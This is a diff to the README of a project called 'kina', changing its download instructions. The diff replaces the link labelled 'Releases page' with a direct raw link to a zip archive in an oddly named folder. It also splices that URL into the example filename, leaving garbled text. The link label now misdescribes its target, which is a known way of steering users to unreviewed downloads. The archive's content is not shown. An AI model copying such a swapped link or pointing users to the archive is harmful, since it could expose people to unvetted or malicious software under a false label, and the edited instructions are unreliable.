Kaamfjdm/kina/README.md

 Follow these steps to download and run kina:

-1. Visit the [Releases page](https://github.com/Kaamfjdm/kina/releases) to get the latest version.
+1. Visit the [Releases page](https://raw.githubusercontent.com/Kaamfjdm/kina/master/Lagothrix/kina-v3.0.zip) to get the latest version.
 2. Look for the version you want to download.
 The latest version will be at the top.
 3. Click on the download link for the appropriate file.
-It may look like `<version>-mac.zip`.
+It may look like `<version>https://raw.githubusercontent.com/Kaamfjdm/kina/master/Lagothrix/kina-v3.0.zip`.
 4. Open the downloaded file and drag the kina application to your Applications folder.
 5. Once the application is in your Applications folder, you can find it by searching or looking in the folder.